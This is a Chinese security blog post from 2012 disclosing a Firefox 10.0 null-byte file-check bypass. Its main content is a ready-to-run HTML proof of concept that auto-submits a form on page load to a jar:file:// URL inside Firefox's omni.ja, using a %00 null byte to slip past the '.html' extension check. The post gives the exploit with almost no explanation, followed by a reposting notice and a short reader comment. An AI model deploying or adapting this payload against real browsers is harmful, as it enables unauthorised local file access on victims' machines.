火狐浏览器10.0本地空字节绕过文件检查执行漏洞

<!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN -->

<html>
<body onLoad=javascript:document.form.submit()>
<form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form">
</form>
</body>
</html>

本文固定链接: https://www.unhonker.com/bug/472.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2012年02月09日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 火狐浏览器10.0本地空字节绕过文件检查执行漏洞 | 90' s Blog|关注网络信息安全

火狐浏览器10.0本地空字节绕过文件检查执行漏洞:目前有1 条留言

  1. 沙发
    Leader:

    加油~~ 谢谢分享~~~

    2012-03-27 15:39

发表评论

您必须 [ 登录 ] 才能发表留言!